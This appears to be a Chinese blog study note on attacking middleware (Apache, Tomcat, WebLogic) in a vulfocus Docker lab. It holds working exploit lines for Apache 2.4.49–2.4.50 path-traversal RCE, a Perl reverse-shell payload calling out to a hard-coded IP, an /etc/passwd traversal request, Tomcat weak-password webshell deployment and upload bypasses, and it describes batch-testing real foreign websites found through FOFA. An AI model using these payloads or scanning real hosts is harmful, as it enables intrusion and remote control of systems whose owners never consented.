中间件的安全问题

前言

了解常见的中间件 : IIS 、 apache、nignx、tomcat

环境搭建中间件的安全问题主要就是实战以前发现的CVE漏洞

环境搭建 上个笔记有如何在kali进行搭建docker

准备kali 已经搭建了docker

复制代码
sudo docker pull vulfocus/vulfocus:latest 
拉取镜像

docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=xxxx vulfocus/vulfocus
启动镜像    run是运行   -d 在后台   -p 端口   -v是进行挂载  : 后边是容器的路径   意思就是把容器的内容映射到本地机目录上    而  -e是设置容器的环境变量

注意这个 ip 0000 是你本机的ip

里面有个log

apache框架下有利于价值的CVE

1、RCE命令执行

应用于apache 2.4.49-2.4.50

我们利用漏洞之前先找到这个漏洞的中间件的版本

正好是在这个版本的

利用exp进行操作

复制代码
使用服务器进行curl请求
curl --data "echo;id" 'http://xx.xx.xx.xx/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'


抓包改包修改
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 
echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

利用exp进行操作

这个rce框架漏洞我们可以进行全网搜 先使用 fafoviewer生成使用fafo搜索的信息可以去批量的测试(这里测试的都是外国网站)

fofa语法:

这边只导出10个是因为我设置的最大导出

2、目录穿越漏洞

复制代码
curl -v --path-as-is 'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

可以直接访问

tomcat框架

1、弱口令爆破

这个就是利用tomcat登录弹窗的弱密码

之后需要getshell

骚操作: 冰蝎生成一个jar木马

和gzl有很明显的差别就是开头没有system

这里让我们上传的是 war文件

压缩一下改名为 war

复制代码
http://192.168.248.132:11374/shell/shell.jsp

连接上就行

2、文件上传漏洞
Apache Tomcat 7.0.0 - 7.0.79

然后复制木马的内容到这个请求数据包的下面

发现报错404??????什么情况 是因为我们后边的http把这个1.jsp当路径处理了但是这个网站内部是没有这个的所以报错了

绕过方式 : /xx.jsp/ //进行包裹

就可以进行连接了

3、文件包含漏洞
Tomcat 6.*

Tomcat 7.* < 7.0.100

Tomcat 8.* < 8.5.51

Tomcat 9.* < 9.0.31

使用

这个工具是py2开发的
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

weblogic

没什么好说的就是工具梭哈

天狐工具包wx搜 狐狸即可下载

点击检查 如果不知道是哪个CVE就一把梭 知道会快很多

相关推荐
用户962377954485 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机8 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机8 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544810 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star10 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544813 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透5 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全